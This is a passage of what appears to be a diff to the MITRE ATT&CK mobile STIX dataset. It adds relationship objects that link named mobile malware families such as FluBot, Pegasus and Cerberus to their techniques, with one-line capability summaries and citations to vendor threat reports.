+ "created": "2020-06-26T15:32:25.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. 
Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:52:43.629Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can obtain the device’s contact list.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e767fc9e-5211-4e7c-b628-5dd03a24af39", + "created": "2020-12-14T15:02:35.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Securelist Asacub", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. 
Retrieved December 14, 2020.", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:32:42.890Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can collect SMS messages as they are received.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a042d55c-b31e-41c1-9cd0-66070ec9a11d", + "type": "relationship", + "created": "2020-10-29T19:21:23.235Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T19:21:23.235Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) has hidden the C2 server address using base-64 encoding. 
(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fd5b3d4b-5d56-4d66-8b57-f858bc139901", + "type": "relationship", + "created": "2020-04-24T17:46:31.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T17:46:31.607Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) contains obfuscated function, class, and variable names, and encrypts its shared preferences using Java’s `PBEWithMD5AndDES` algorithm.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dd54e35c-d68b-4aa8-ad2a-acd4c76243c8", + "created": "2023-01-18T19:58:00.503Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). 
SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:57:14.522Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use RC4 to encrypt C2 payloads.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ee095f20-eef5-4dcc-a537-70b387592c2c", + "created": "2023-02-28T20:38:46.702Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "bitdefender_flubot_0524", + "description": "Filip TRUȚĂ, Răzvan GOSA, Adrian Mihai GOZOB. (2022, May 24). New FluBot Campaign Sweeps through Europe Targeting Android and iOS Users Alike. 
Retrieved February 28, 2023.", + "url": "https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:15:20.089Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can use Accessibility Services to make removal of the malicious app difficult.(Citation: bitdefender_flubot_0524)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5b87bb01-9587-42bd-aa6b-30158ca8f55f", + "type": "relationship", + "created": "2020-04-08T15:41:19.427Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." 
+ } + ], + "modified": "2020-09-11T15:42:15.628Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can send, receive, and delete SMS messages.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--abf03652-acd0-4361-8a66-f7e70e8e4376", + "created": "2020-06-02T14:32:31.913Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Volexity Insomnia", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020.", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:12:12.766Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) communicates with the C2 server using HTTPS requests.(Citation: Volexity Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04ae1d87-1741-4cfd-84ff-3c5e46c0b112", + "created": "2022-04-05T19:59:03.285Z", + "x_mitre_version": "0.1", + 
"x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:59:03.285Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "target_ref": "attack-pattern--2ccc3d39-9598-4d32-9657-42e1c7095d26", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--60ecd154-e907-419a-b41d-1a9a1f59e7c3", + "created": "2019-07-10T15:35:43.712Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:36:27.557Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) has the ability to delete attacker-specified files from compromised devices.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--be27a303-5748-4b72-ba69-a328e2f6cc08", + "type": "relationship", + "created": "2020-12-31T18:25:05.177Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2020-12-31T18:25:05.177Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) can download new modules while running.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4d542595-1eb0-45aa-9702-9d494142b390", + "type": "relationship", + "created": "2019-08-09T18:08:07.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. 
Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.109Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can record video or capture photos when an infected device is in a specified location.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8870c211-820a-46a1-96fc-02f4e6eaec03", + "type": "relationship", + "created": "2020-11-10T16:50:39.134Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T15:40:36.387Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has collected device network information, including 16-bit GSM Cell Identity, 16-bit Location Area Code, Mobile Country Code (MCC), and Mobile Network Code (MNC). 
[CarbonSteal](https://attack.mitre.org/software/S0529) has also called `netcfg` to get stats.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--57a5ae72-6932-45e6-83f2-609943902b35", + "created": "2023-03-20T18:50:33.248Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:50:33.248Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d8ca4ea5-5242-4f0f-b3b7-008673f561ab", + "type": "relationship", + "created": "2020-09-11T16:22:03.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-11T16:22:03.229Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect and record audio content.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2e6d507e-afbb-4fa5-b459-2b060ab52db3", + "created": "2020-12-18T20:14:47.316Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020.", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:50:29.535Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) checks whether its call stack has been modified, an indication that it is running in an analysis environment, and if so, does not decrypt its obfuscated strings(Citation: WhiteOps TERRACOTTA).", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d6e4fdc6-c936-4bb9-861f-fafd3b72fcb4", + "type": "relationship", + "created": "2021-02-17T20:43:52.413Z", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.413Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has compressed and encrypted data before exfiltration using password protected .7z archives.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4088b31b-d542-4935-84b4-82b592159591", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. 
Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-10-10T15:22:52.591Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can collect contacts and messages from popular applications, including Facebook Messenger, WhatsApp, Skype, Viber, Line, WeChat, Hangouts, Telegram, and BlackBerry Messenger.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3d24d88e-a0ab-42c6-8e8f-11f721082bba", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. 
Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.838Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) attempts to exploit well-known Android OS vulnerabilities to escalate privileges.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--96298aed-9e9f-4836-b29b-04c88e79e53e", + "created": "2022-04-01T18:42:37.987Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates often contain patches for vulnerabilities that could be exploited for root access. Root access is often a requirement to impairing defenses.", + "modified": "2022-04-01T18:42:37.987Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1a2f6cdc-7c52-4f6e-9182-bc5b16a638dd", + "created": "2020-07-15T20:20:59.289Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). 
Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:49:47.110Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can evade automated analysis environments by requiring a CAPTCHA on launch that will prevent the application from running if not passed. It also checks for indications that it is running in an emulator.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--72a5350f-f0cf-4f44-82d5-28a25492c6af", + "type": "relationship", + "created": "2020-04-24T15:06:33.531Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-04-24T17:55:55.049Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can take pictures using the camera and can record MP4 files.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--626d4c6c-97e4-4aa3-922b-c1a81e677213", + "created": "2023-03-20T15:32:36.972Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:32:36.972Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--17141729-226d-40d4-928d-ffbd2eed7d11", + "created": "2022-04-05T19:37:16.086Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:37:16.086Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--638f3d4b-f1d4-4c61-91a0-7c125ef8437a", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) was distributed through a web site by exploiting vulnerabilities in the Safari web browser on iOS devices.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eda3c5c4-d062-48d3-a78e-051f0c9d62f6", + "created": "2023-02-28T20:31:55.191Z", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. 
Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T20:31:55.191Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can access app notifications.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d7ae7fb1-c363-4969-a4af-e2dd44a3c064", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. 
